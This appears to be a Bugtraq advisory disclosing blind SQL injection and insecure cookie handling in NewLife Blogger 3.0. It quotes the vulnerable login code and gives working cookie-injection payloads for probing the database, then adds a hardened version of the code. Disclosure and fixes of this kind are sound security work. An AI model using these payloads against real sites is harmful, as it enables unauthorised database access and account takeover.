NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugtraq-owner@xxxxxxxxxxxxxxxxx
- Subject: NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability
- From: Pepelux <pepelux@xxxxxxxxxxxx>
- Date: Mon, 13 Oct 2008 01:55:59 +0200
- Sender: pepeluxx@xxxxxxxxx
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$ Program: NewLife Blogger
$ Version: <= 3.0
$ File affected: system/nlb_user.class.php
$ Download: http://sourceforge.net/projects/nlb/
Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org
Cookie format is:
nlb3=7::96e79218965eb72c92a549dd5a330112
i.e. nlb3=<user_id>::<md5 of the password>
-- Bug (system/nlb_user.class.php, lines 143-159) --
function checkLogin( ) {
    // login check
    if( isset( $_COOKIE['nlb3'] ) ) {
        $data = explode( '::', $_COOKIE['nlb3'] );
        $id = $data[0];
        $pass = $data[1];
        // $id comes straight from the cookie and is concatenated into the query
        // without any validation or escaping
        $fromdb = $this->sql->getArray('SELECT password FROM ' . db_users . ' WHERE user_id = ' . $id . ' LIMIT 1;');
        if( $pass === $fromdb['password'] ) {
            $this->setid( $id );
            $this->isLogedIn = true;
        } else {
            $this->isLogedIn = false;
        }
    }
    // we also check for banned users
    $this->checkBanned();
}
-- Exploit --
True/false method for blind MySQL injection. Examples:
javascript:document.cookie = "nlb3=7 and 1=1::96e79218965eb72c92a549dd5a330112"
Response: you appear as logged in
javascript:document.cookie = "nlb3=7 and 1=0::96e79218965eb72c92a549dd5a330112"
Response: you appear as not logged in
javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=4::96e79218965eb72c92a549dd5a330112"
Response: you appear as logged in if the MySQL version is 4
javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=5::96e79218965eb72c92a549dd5a330112"
Response: you appear as logged in if the MySQL version is 5
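For comparison with the vulnerable checkLogin() above, here is a hardened version written for this post (it is not NewLife Blogger's code). It assumes a PDO connection in $this->pdo, the same nlb3 cookie layout, and the application's db_users constant; the class and property names are illustrative.

```php
<?php
// Added example, not NewLife Blogger's code: a hardened checkLogin() for the
// cookie layout described in the advisory (nlb3=<user_id>::<md5 of password>).
// Assumes a PDO connection is available as $this->pdo and that the db_users
// constant is defined by the application, as in the original class.
class NlbUserHardened
{
    public bool $isLoggedIn = false;
    private ?int $id = null;

    public function __construct(private PDO $pdo) {}

    public function checkLogin(): void
    {
        $this->isLoggedIn = false;
        if (!isset($_COOKIE['nlb3'])) {
            return;
        }
        $data = explode('::', (string) $_COOKIE['nlb3'], 2);
        if (count($data) !== 2) {
            return;
        }
        [$rawId, $pass] = $data;
        // Fix 1: the user id must be a plain positive integer. A value such as
        // "7 and 1=1" is rejected here and never reaches the SQL text.
        if (!ctype_digit($rawId)) {
            return;
        }
        $id = (int) $rawId;
        // Fix 2: bind the id as a parameter instead of concatenating it, so
        // even a non-numeric value could not alter the query structure.
        $stmt = $this->pdo->prepare(
            'SELECT password FROM ' . db_users . ' WHERE user_id = ? LIMIT 1'
        );
        $stmt->execute([$id]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        if ($row === false || !is_string($row['password'])) {
            return;
        }
        // Fix 3: constant-time comparison of the stored hash with the cookie value.
        if (!hash_equals($row['password'], $pass)) {
            return;
        }
        $this->id = $id;
        $this->isLoggedIn = true;
    }
}
```

Closing the injection does not fix the cookie design itself: a cookie that carries the password hash lets anyone who obtains that hash log in without the password, so a random server-side session token should replace it.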